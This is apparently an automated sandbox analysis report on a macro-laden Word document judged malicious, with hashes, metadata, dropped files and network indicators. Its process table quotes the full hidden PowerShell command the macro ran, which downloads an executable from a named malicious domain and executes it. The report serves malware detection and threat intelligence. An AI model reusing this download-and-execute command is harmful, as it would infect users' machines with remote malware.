analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

22c8b9adcb3f59cf561105e02d7005855963ca5bf3aa8042fdc2f8805c31cdd3.doc

Full analysis: https://app.any.run/tasks/0b33e33c-c66f-4f04-ba03-722f5e84b187
Verdict: Malicious activity
Analysis date: July 11, 2019, 13:01:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: lenovio, Template: Normal, Last Saved By: lenovio, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Jul 3 11:44:00 2019, Last Saved Time/Date: Wed Jul 3 11:45:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
MD5:

7BD2A8E5A0FF1485ACA17DEE7131B317

SHA1:

9CC5F4E28E128727C041E52DBBB68E0092A21F32

SHA256:

22C8B9ADCB3F59CF561105E02D7005855963CA5BF3AA8042FDC2F8805C31CDD3

SSDEEP:

192:weQFyZEozyGc6ri5bv/0yl3hnZ2FHK/qbd0jM6c+xZC1rXnqnnE4twOWvsba:wedyGcS2r3j2NJd0jTc+a1TnMnE4tw

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3096)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3096)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2292)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3096)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (45.7)
.xls | Microsoft Excel sheet (42.8)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: -
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: -
Words: -
Pages: 1
ModifyDate: 2019:07:03 10:45:00
CreateDate: 2019:07:03 10:44:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: lenovio
Template: Normal
Author: lenovio
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3096"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\22c8b9adcb3f59cf561105e02d7005855963ca5bf3aa8042fdc2f8805c31cdd3.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2292powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object System.Net.WebClient).Downloadfile('http://btik.web.id/mat/ggg.exe','ggg.exe'); Invoke-Item ggg.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 257
Read events
862
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA23.tmp.cvr
MD5:
SHA256:
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VWDFWG4IKZZEW6IIU4RH.temp
MD5:
SHA256:
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1015db.TMPbinary
MD5:4B92A079D7F4DFA0DFE9125E60FE7814
SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
3096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$c8b9adcb3f59cf561105e02d7005855963ca5bf3aa8042fdc2f8805c31cdd3.docpgc
MD5:0D893C6B43137532009D16136000E685
SHA256:FE12C671C099348094A25CC804BD69F1A761862869738D925FA34404B0D7685E
3096WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:23E5145AE175E685152873D4F3E9BE90
SHA256:2054A46AE49EBFBA2562CC5301F0D4BB8A5BA5D58F767FB0BB3D7807451B07EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2292
powershell.exe
103.11.74.19:80
btik.web.id
PT Master Web Network
ID
suspicious

DNS requests

Domain
IP
Reputation
btik.web.id
  • 103.11.74.19
malicious

Threats

No threats detected
No debug info